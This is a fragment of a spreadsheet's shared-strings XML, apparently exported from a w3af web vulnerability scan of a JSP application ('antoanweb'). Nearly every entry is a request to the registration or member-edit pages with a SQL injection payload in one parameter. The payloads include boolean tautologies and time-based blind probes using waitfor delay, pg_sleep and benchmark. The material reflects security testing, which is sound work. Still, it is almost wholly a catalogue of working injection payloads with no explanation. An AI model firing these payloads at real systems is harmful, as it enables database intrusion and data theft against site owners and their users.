    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1+or+pg_sleep(5)&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1'+or+pg_sleep(5)+or+'1'='1&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1"+or+pg_sleep(5)+or+"1"="1&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=6"+or+"6"="6&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=6"+and+"6"="7&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=6'+or+'6'='6&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=6'+and+'6'='7&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=6+or+6=6+&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=6+and+6=7+&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=1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24&amp;login=1)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24&amp;login=1))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24&amp;login=1'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24&amp;login=1')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24&amp;login=1'));waitfor+delay+'0:0:5'--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=1+or+benchmark(2500000,md5(1))&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=1+or+pg_sleep(5)&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=1'+or+pg_sleep(5)+or+'1'='1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=1"+or+pg_sleep(5)+or+"1"="1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=73"+or+"73"="73&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=73"+and+"73"="74&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=73'+or+'73'='73&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=73'+and+'73'='74&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=73+or+73=73+&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=73+and+73=74+&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=1;waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=1);waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=1));waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=1';waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=1');waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=1'));waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=1+or+benchmark(2500000,md5(1))&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=1+or+pg_sleep(5)&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=1'+or+pg_sleep(5)+or+'1'='1&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=1"+or+pg_sleep(5)+or+"1"="1&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50"+or+"41"="41&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50"+and+"41"="42&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50'+or+'41'='41&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50'+and+'41'='42&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50+or+41=41+&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50+and+41=42+&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=1;waitfor+delay+'0:0:5'--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=1);waitfor+delay+'0:0:5'--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=1));waitfor+delay+'0:0:5'--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=1';waitfor+delay+'0:0:5'--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=1');waitfor+delay+'0:0:5'--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=1'));waitfor+delay+'0:0:5'--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=1+or+benchmark(2500000,md5(1))&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=1+or+pg_sleep(5)&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=1'+or+pg_sleep(5)+or+'1'='1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=1"+or+pg_sleep(5)+or+"1"="1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=86"+or+"86"="86&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=86"+and+"86"="87&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=86'+or+'86'='86&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=86'+and+'86'='87&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=86+or+86=86+&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=86+and+86=87+&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=1;waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=1);waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=1));waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=1';waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=1');waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=1'));waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=1+or+benchmark(2500000,md5(1))&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=1+or+pg_sleep(5)&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=1'+or+pg_sleep(5)+or+'1'='1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=1"+or+pg_sleep(5)+or+"1"="1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64"+or+"64"="64&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=64"+and+"64"="65&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=64'+or+'64'='64&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=64'+and+'64'='65&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=64+or+64=64+&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=64+and+64=65+&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1;waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1);waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1));waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1';waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1');waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1'));waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1+or+benchmark(2500000,md5(1))&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1+or+pg_sleep(5)&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1'+or+pg_sleep(5)+or+'1'='1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=1"+or+pg_sleep(5)+or+"1"="1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3"+or+"3"="3&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=3"+and+"3"="4&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
